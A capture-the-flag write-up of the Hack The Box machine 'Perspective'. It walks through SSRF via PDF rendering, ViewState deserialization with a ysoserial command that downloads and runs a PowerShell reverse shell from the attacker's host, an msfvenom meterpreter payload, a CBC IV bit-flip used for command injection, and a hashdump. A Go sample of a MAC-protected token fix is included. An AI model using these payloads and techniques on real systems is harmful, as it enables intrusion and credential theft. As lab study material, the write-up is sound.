Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.11.151
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-01 13:31 CST
Nmap scan report for 10.10.11.151
Host is up (0.20s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 d6:7f:3f:d4:22:15:ce:64:f3:c8:00:79:bf:f6:f8:f8 (RSA)
| 256 08:c6:d4:f3:98:84:0f:fd:4b:ed:e3:a6:25:bd:e7:70 (ECDSA)
|_ 256 32:81:6a:8b:4d:f9:61:09:ff:d3:99:6c:e7:3f:a3:ac (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.66 seconds

80

After adding the hosts entry and visiting the site, we find an NPRS application:

10.10.11.151 perspective.htb

NPRS

Register and log in; the support page reveals the administrator's email address:

admin@perspective.htb

reset password

On the login page choose "forgot password". In the first step, enter your own registered email; in the second step, leave the security question blank, intercept the request and change the email to the admin's address. This successfully resets the admin password.

Admin Panel

The admin function loads user information and generates a PDF from it:

include file

Back in the ordinary user interface, create a new part. The image upload function, combined with the web application, allows reading files:

According to the contents of web.config, the next step is port 8080 on localhost:

<appSettings>
<add key="environment" value="Production" />
<add key="Domain" value="perspective.htb" />
<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
<add key="SecurePasswordServiceUrl" value="http://localhost:8000" />
</appSettings>

local 8080

This is combined with the admin's PDF function: in the Description field we load HTML that we control, containing an iframe that loads local 8080:

During rendering, the iframe is executed and loads local 8080, which turns out to be a Swagger UI:

Description

<META HTTP-EQUIV="refresh" CONTENT="0;url=http://10.10.14.8/test.html">

test.html

<iframe src="http://localhost:8000/" height="2000px" width="2000px" >
</iframe>

Decrypt

The rest is gathering information step by step and calling the decrypt endpoint to decrypt ViewStateUserKey:

SAltysAltYV1ewSTaT3

swagger.html

<iframe src="http://localhost:8000/swagger/v1/swagger.json" height="2000px" width="2000px"></iframe>

decrypt.html

<html>
<body>
<h1>Pwned</h1>
<p><br></p>
<form id="Pwnform" target="iframe" method="post" action="http://localhost:8000/decrypt?cipherTextRaw=ENC1%3a3UVxtz9jwPJWRvjdl1PfqXZTgg%3d%3d">
<input type="text">
</form>
<iframe name="iframe"></iframe>
<script type="text/javascript">document.getElementById('Pwnform').submit();</script>
</body>
</html>

ViewState deserialization

With ViewStateUserKey in hand, the rest is deserialization; all the other required information can be found in the web.config obtained earlier:

C:\Users\miao\Desktop\ysoserial-1.34\Release>ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8/Invoke-PowerShellTcp.ps1')" --generator=0414C274 --validationalg="SHA1" --viewstateuserkey="SAltysAltYV1ewSTaT3" --validationkey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF"


Again, substitute the generated payload in the ordinary user's "new part" form to trigger the deserialization and obtain a reverse shell:

user flag

On the desktop of the webuser account we obtained, user.txt:

webuser_id_rsa

SSH is enabled on this Windows host, and the current user's .ssh directory contains the private key, which is convenient for the later steps:


Information

Port 8009, once forwarded out, looks the same as the previous website:

ssh -i webuser_id_rsa webuser@10.10.11.151 -L 8009:127.0.0.1:8009

perespective.dll

Decompile the .NET DLL and analyze the code; the key part is the token handling:

C:\WEBAPPS\PartImages_Staging\bin\perespective.dll
C:\WEBAPPS\PartImages_Prod\bin\perespective.dll

This is cryptography territory: the token uses AES-CBC, and the first 16 bytes are the IV.

Roughly, the code invokes a local command to change the password, so there is a command injection.

CBC attack

# Password reset request: pad the email to 16 bytes, obtain the token and decode it
a@a.aa++++++++++

$ echo -n vedAtEi1tb8mS67dUSv1CqojLHQPIfwhGxdUofWkhaN40d1KbzY7tKS0gZjr1CMZ | base64 -d| xxd -p| tr -d "\n"

bde740b448b5b5bf264baedd512bf50aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319

# Create a shell and upload it to the server
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe

meterpreter > pwd
C:\x
meterpreter > upload /Users/miao/use_miao_wwwwwww/Hacking/HackTheBox/Perspective/shell.exe
mv shell.exe x.exe

# The first 16 bytes, i.e. the first 32 hex characters, are the IV
>>> data = "bde740b448b5b5bf264baedd512bf50aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319"
>>> data[:32]
'bde740b448b5b5bf264baedd512bf50a'

Two XORs
# The first: the original email
# 6140612e616120202020202020202020
# a@a.aa

# The second: the modified value carrying the command injection
# raw hex: 6140612e6161265c785c782e65786520
# a@a.aa&\x\x.exe

https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'6140612e616120202020202020202020'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'6140612e6161265c785c782e65786520'%7D,'Standard',false)To_Hex('None',0)&input=YmRlNzQwYjQ0OGI1YjViZjI2NGJhZWRkNTEyYmY1MGE

bde740b448b5b5bf264baedd512bf50a
->
bde740b448b5b3c37e37f6d31473b00a

The result becomes the new IV:
>>> data[32:]
'aa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'
>>> "bde740b448b5b3c37e37f6d31473b00a" + 'aa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'
'bde740b448b5b3c37e37f6d31473b00aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'

# Generate the new token
https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Base64('A-Za-z0-9%2B/%3D')Find_/_Replace(%7B'option':'Simple%20string','string':'%2B'%7D,'-',true,false,true,false)Find_/_Replace(%7B'option':'Simple%20string','string':'/'%7D,'_',true,false,true,false)&input=YmRlNzQwYjQ0OGI1YjNjMzdlMzdmNmQzMTQ3M2IwMGFhYTIzMmM3NDBmMjFmYzIxMWIxNzU0YTFmNWE0ODVhMzc4ZDFkZDRhNmYzNjNiYjRhNGI0ODE5OGViZDQyMzE5

vedAtEi1s8N-N_bTFHOwCqojLHQPIfwhGxdUofWkhaN40d1KbzY7tKS0gZjr1CMZ

# Note: keep the earlier request where the token was obtained held in the interceptor; do not forward it
# Substitute the new token, follow the redirect to the change-password page, submit the password change, and the command injection fires
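As an added example (not code from this writeup or from the target's DLL), the following Go program shows why an AES-CBC token whose IV is carried unauthenticated in the token is malleable, which is the XOR step the CyberChef recipe above performs on the first block, and how an encrypt-then-MAC wrapper rejects the flipped token before it is ever decrypted. The keys, IV and email strings are constructed demo values, not values recovered from the box.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
)

// Constructed demo keys (not values recovered from the box); 16 bytes each.
var encKey, macKey = []byte("0123456789abcdef"), []byte("fedcba9876543210")

// Weak pattern from the writeup: token = iv || AES-CBC(plaintext), no integrity check.
func sealCBC(iv, pt []byte) []byte {
	block, _ := aes.NewCipher(encKey)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return append(append([]byte{}, iv...), ct...)
}
func openCBC(token []byte) []byte {
	block, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(token)-16)
	cipher.NewCBCDecrypter(block, token[:16]).CryptBlocks(pt, token[16:])
	return pt
}

// Why it fails: P1 = D(C1) XOR IV, so XORing the IV with old XOR new rewrites
// the first plaintext block without the key (what the CyberChef recipe does).
func flipFirstBlock(token, oldBlock, newBlock []byte) []byte {
	out := append([]byte{}, token...)
	for i := 0; i < 16; i++ {
		out[i] ^= oldBlock[i] ^ newBlock[i]
	}
	return out
}

// Hardened variant: encrypt-then-MAC over iv||ct, verified before decryption
// (an AEAD such as AES-GCM is the modern alternative).
func sealAuth(iv, pt []byte) []byte {
	tok := sealCBC(iv, pt)
	h := hmac.New(sha256.New, macKey)
	h.Write(tok)
	return h.Sum(tok)
}
func openAuth(token []byte) ([]byte, bool) {
	n := len(token) - sha256.Size
	if n < 32 { return nil, false } // need iv + one block + tag
	h := hmac.New(sha256.New, macKey)
	h.Write(token[:n])
	if !hmac.Equal(h.Sum(nil), token[n:]) { return nil, false } // reject before decrypting
	return openCBC(token[:n]), true
}
```

A reset-token format like this should also bind the token to the account server-side and expire it, so that even a forged first block cannot be replayed against the change-password step.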

root flag

On the Administrator desktop, root.txt:

hash

meterpreter > hashdump

References